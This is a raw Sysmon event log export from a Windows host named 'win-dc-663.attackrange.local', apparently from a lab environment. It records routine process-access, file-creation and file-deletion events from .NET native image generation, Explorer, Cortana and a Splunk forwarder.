21:06:49.572{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0905-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.572{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.572{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.572{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.510{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0805-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.494{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0805-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.494{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0805-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:06:49.463{4DB9351A-A269-60D3-0705-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15d8-0\WsatConfig.exe2021-06-23 21:06:49.463 23542300x800000000000000022349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.447{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.432{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.432{4DB9351A-9F2C-60D3-D000-00000000CF01}50642116C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55af0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF800962E08C8)|UNKNOWN(FFFFFD16C60B4A68)|UNKNOWN(FFFFFD16C60B4BE7)|UNKNOWN(FFFFFD16C60AF271)|UNKNOWN(FFFFFD16C60B0C3A)|UNKNOWN(FFFFFD16C60AEEF6)|UNKNOWN(FFFFF80095FF7E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000022346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.432{4DB9351A-9F2C-60D3-D000-00000000CF01}50642116C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+555d1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF800962E08C8)|UNKNOWN(FFFFFD16C60B4A68)|UNKNOWN(FFFFFD16C60B4BE7)|UNKNOWN(FFFFFD16C60AF271)|UNKNOWN(FFFFFD16C60B0C3A)|UNKNOWN(FFFFFD16C60AEEF6)|UNKNOWN(FFFFF80095FF7E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5935b|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.307{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0705-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.291{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0705-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.291{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0705-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0605-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000022340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000022339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0605-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.213{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0605-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:49.135{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1418-0\WindowsFormsIntegration.dll2021-06-23 21:06:49.135 23542300x800000000000000022334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.119{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=001993D17F060C853EBF57823BAA61B4,SHA256=8E9520594495CFCEA26010C3A7F251973026E8428216939015318CDB5CD6D309,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.593{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-1005-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.577{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-1005-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022410Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 